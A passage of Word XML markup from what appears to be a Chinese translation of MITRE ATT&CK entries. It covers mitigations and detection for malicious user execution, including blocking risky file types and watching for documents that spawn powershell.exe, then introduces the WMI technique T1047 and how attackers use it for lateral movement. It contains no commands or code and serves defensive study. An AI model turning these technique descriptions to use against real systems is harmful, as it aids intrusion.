          <w:p w14:paraId="0FB5F57A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00A21B67" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A21B67">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7047" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="5296F800" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00A21B67" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A21B67">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00ED5496" w14:paraId="4498EDA1" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2689" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D9D2C0B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00ED5496" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00ED5496">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>执行预防</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7047" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="01AF7E9D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00ED5496" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00ED5496">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>应用程序白名单可以阻止运行伪装的可执行文件</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00ED5496" w14:paraId="09DD1B5D" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2689" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="39E113DB" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00ED5496" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00ED5496">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>网络入侵</w:t>
            </w:r>
            <w:r w:rsidRPr="00ED5496">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>防范</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7047" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0AC3854A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00ED5496" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00ED5496">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>如果用户正在访问某个链接，则可以使用网络入侵防范系统和旨在扫描和删除恶意下载的系统来阻止活动</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00ED5496" w14:paraId="21B2A467" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2689" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="026F6A19" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00ED5496" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00ED5496">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>限制基于</w:t>
            </w:r>
            <w:r w:rsidRPr="00ED5496">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Web</w:t>
            </w:r>
            <w:r w:rsidRPr="00ED5496">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>的内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7047" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0745F41D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00ED5496" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00ED5496">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>如果用户正在访问某个链接，默认</w:t>
            </w:r>
            <w:r w:rsidRPr="00ED5496">
              <w:t>或者</w:t>
            </w:r>
            <w:r w:rsidRPr="00ED5496">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>根据策略从可疑站点阻止未知</w:t>
            </w:r>
            <w:r w:rsidRPr="00ED5496">
              <w:t>或</w:t>
            </w:r>
            <w:r w:rsidRPr="00ED5496">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>未</w:t>
            </w:r>
            <w:r w:rsidRPr="00ED5496">
              <w:t>使用的文件下载，这是</w:t>
            </w:r>
            <w:r w:rsidRPr="00ED5496">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>防止</w:t>
            </w:r>
            <w:r w:rsidRPr="00ED5496">
              <w:t>.scr, .exe, .pif, .cpl</w:t>
            </w:r>
            <w:r w:rsidRPr="00ED5496">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>等载体</w:t>
            </w:r>
            <w:r w:rsidRPr="00ED5496">
              <w:t>的最佳</w:t>
            </w:r>
            <w:r w:rsidRPr="00ED5496">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>实践</w:t>
            </w:r>
            <w:r w:rsidRPr="00ED5496">
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00ED5496" w14:paraId="0019FF61" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2689" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5D59BFCD" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00ED5496" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00ED5496">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户培训</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7047" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="571FF57F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00ED5496" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00ED5496">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
            <w:r w:rsidRPr="00ED5496">
              <w:t>培训可以提升用户关于常见网络钓鱼技术的意识，以及</w:t>
            </w:r>
            <w:r w:rsidRPr="00ED5496">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>提高对潜在恶意事件的警惕。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0066D17B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="037F19BB" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有些</w:t>
      </w:r>
      <w:r>
        <w:t>应用程序能够被攻击者利用用户交互来获取</w:t>
      </w:r>
      <w:r w:rsidRPr="0004179B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>初始访问</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，监听</w:t>
      </w:r>
      <w:r>
        <w:t>这些</w:t>
      </w:r>
      <w:r w:rsidRPr="0004179B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用程序的执行和命令行参数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。这</w:t>
      </w:r>
      <w:r>
        <w:t>包括压缩应用程序</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>这样</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB5426">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>清除</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB5426">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB5426">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解码有效载荷中的文件或信息</w:t>
      </w:r>
      <w:r>
        <w:t>，比如打包成</w:t>
      </w:r>
      <w:r>
        <w:t>zip</w:t>
      </w:r>
      <w:r>
        <w:t>文件</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB5426">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0AC5B5" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>杀毒</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB5426">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>软件可能检测到用户计算机上下载和执行的恶意文档和文件。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当</w:t>
      </w:r>
      <w:r>
        <w:t>客户端利用执行或者脚本</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编程</w:t>
      </w:r>
      <w:r>
        <w:t>技术的文件被打开时，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>终端</w:t>
      </w:r>
      <w:r>
        <w:t>检测或者网络检测可能检测出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其中</w:t>
      </w:r>
      <w:r>
        <w:t>的恶意</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>事件</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB5426">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB5426">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Microsoft Word</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB5426">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文档或</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB5426">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PDF</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB5426">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访问</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网络</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB5426">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或生成</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB5426">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>powershell.exe</w:t>
      </w:r>
      <w:r>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E4F7A17" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>管理指令集</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="56B07B6E" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0A0B9F66" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>T1047</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7AEEB3C3" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>执行</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32734A62" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0BF965E6" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>系统要求：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>WMI</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>服务，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>winmgmt</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，正在运行；主机</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>网络防火墙允许从源头到目标的</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>SMB</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>和</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>WMI</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>端口；</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>SMB</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>认证</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79C6E94A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>所需权限：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>，管理员</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5EF0B9B0" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>认证</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>日志，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Netflow/Enclave</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>技术网络流分析，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>进程监控，进程命令行参数</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54106DE0" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>是否支持远程：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>是</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15541B85" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4B7C1B0E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7326B7BB" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WMI</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows Management Instrumentation</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）是</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>管理功能，它为本地和远程访问</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统组件提供了统一的环境。它依赖</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>WMI</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务来进行本地和远程访问，以及</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>SMB</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（服务器消息块）和</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>RPCS</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（远程过程调用服务）来进行</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>远程访问</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>RPCS</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过端口</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>135</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>运行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F63845C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可能会使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WMI</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与本地和远程系统交互，也可能</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WMI</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来将执行许多策略功能，例如为发现收集信息和远程执行文件</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>来</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>横向移动。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D987FA" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2915"/>
        <w:gridCol w:w="6821"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00A21B67" w14:paraId="7B029E8B" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2915" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="0F425166" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00A21B67" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A21B67">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6821" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="7E3965C8" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00A21B67" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A21B67">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
